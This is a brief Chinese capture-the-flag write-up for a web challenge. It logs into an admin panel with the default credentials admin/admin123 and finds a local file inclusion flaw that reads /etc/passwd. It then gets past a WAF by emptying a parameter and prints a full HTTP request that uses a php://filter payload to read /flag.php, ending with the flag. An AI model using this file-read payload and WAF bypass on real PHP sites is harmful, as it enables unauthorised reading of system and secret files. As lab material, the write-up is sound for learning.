后台管理系统

弱口令admin admin123进入后台

再次弱口令admin admin123进入后台

抓包查看内容

page可控 猜测存在任意文件读取漏洞

读取etc/passwd成功

尝试读取flag 发现存在waf(根本无法绕过的waf)

删除actions的值即可绕过waf

exp如下

GET /api/logs.php?action=&page=php://filter/read=convert.base64-encode/resource=/flag.php HTTP/2
Host: eci-2zebitqp4m6ttlkfyjri.cloudeci1.ichunqiu.com:80
Cookie: PHPSESSID=3c3c951af8e524ee646a4da17a29f370
Sec-Ch-Ua-Platform: "Windows"
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGVzIjpbInN1cGVyX2FkbWluIl0sInBlcm1pc3Npb25zIjpbInVzZXIudmlldyIsInVzZXIuY3JlYXRlIiwidXNlci5lZGl0IiwidXNlci5kZWxldGUiLCJ1c2VyLnJlc2V0X3Bhc3N3b3JkIiwidXNlci5sb2NrIiwicm9sZS52aWV3Iiwicm9sZS5jcmVhdGUiLCJyb2xlLmVkaXQiLCJyb2xlLmRlbGV0ZSIsInJvbGUucGVybWlzc2lvbiIsImFubm91bmNlbWVudC52aWV3IiwiYW5ub3VuY2VtZW50LmNyZWF0ZSIsImFubm91bmNlbWVudC5lZGl0IiwiYW5ub3VuY2VtZW50LmRlbGV0ZSIsImFubm91bmNlbWVudC5wdWJsaXNoIiwibG9nLnZpZXciLCJjdXN0b21lci52aWV3IiwiY3VzdG9tZXIuY3JlYXRlIiwiY3VzdG9tZXIuZWRpdCIsImN1c3RvbWVyLmRlbGV0ZSIsImN1c3RvbWVyLmludml0YXRpb24iLCJhZ2VudC52aWV3IiwiYWdlbnQuY3JlYXRlIiwiYWdlbnQuZWRpdCIsImFnZW50LmRlbGV0ZSIsInJldmVudWUudmlldyJdLCJpYXQiOjE3NjMwOTQ4NjYsImV4cCI6MTc2MzY5OTY2Nn0.BAbzi8VyinuzaCJWUycmOjC1JryED7sCVgLu_MdYTP8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Edg/142.0.0.0
Accept: application/json, text/plain, */*
Sec-Ch-Ua: "Chromium";v="142", "Microsoft Edge";v="142", "Not_A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://eci-2zebitqp4m6ttlkfyjri.cloudeci1.ichunqiu.com:80/admin.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Priority: u=1, i

flag{q4z1j08u29615b3315}